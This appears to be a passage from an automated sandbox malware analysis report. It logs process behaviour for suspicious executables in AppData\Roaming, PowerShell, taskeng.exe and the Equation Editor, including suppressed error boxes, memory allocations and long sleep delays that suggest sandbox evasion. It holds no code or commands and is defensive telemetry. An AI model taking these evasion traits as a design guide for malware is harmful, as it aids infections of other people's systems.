                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 2130000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 1F60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 5450000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 6450000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 6580000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeMemory allocated: 7580000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 160000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 21A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 4F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 5520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 6520000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 6650000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeMemory allocated: 7650000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3027Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3330Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4588Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1568Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1775
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2035
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1157
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2019
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 3232Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3336Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exe TID: 3380Thread sleep time: -1020000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\taskeng.exe TID: 3464Thread sleep time: -120000s >= -30000s
